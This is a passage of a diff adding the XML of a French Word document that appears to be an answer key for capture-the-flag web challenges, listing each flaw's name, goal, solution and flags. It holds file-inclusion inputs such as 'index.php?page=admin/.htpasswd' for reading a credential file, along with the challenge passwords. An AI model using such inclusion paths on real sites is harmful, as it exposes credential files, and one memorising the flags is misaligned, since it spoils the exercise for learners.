+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Difficulté de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Description de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Les includes c'est pas sécure et les commentaires non plus..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Capture d’écran :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7610E4DD" wp14:editId="0128EE72">
+            <wp:extent cx="5760720" cy="911225"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="3" name="Image 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="911225"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Solution : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Utiliser le get page pour entrer sur le serveur, et regarder le code source de la page bdd.php index.php?page=bdd.php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flag de la faille A : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>M0nmdp$ecure123</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flag de la faille B : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>M4bddest$ecure123</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Nom de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>http-022</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Catégorie de la faille </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Objectif de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Bypass html identification</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Difficulté de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Description de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Contourner l'identification html et trouvez le mot de passe pour valider l'épreuve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Capture d’écran :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EA02A7C" wp14:editId="718AB02C">
+            <wp:extent cx="5029200" cy="1704975"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="18" name="Image 18"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5029200" cy="1704975"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Solution : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Analyser l’arborescence et accéder au .htpasswd index.php?page=admin/.htpasswd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flag de la faille A : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>M0nmdp$ecure123htpasswd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flag de la faille B : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>C3siteE$tpasSecur3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Nom de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>http-023</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Catégorie de la faille </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Objectif de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>XSS TeamA vs TeamB</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
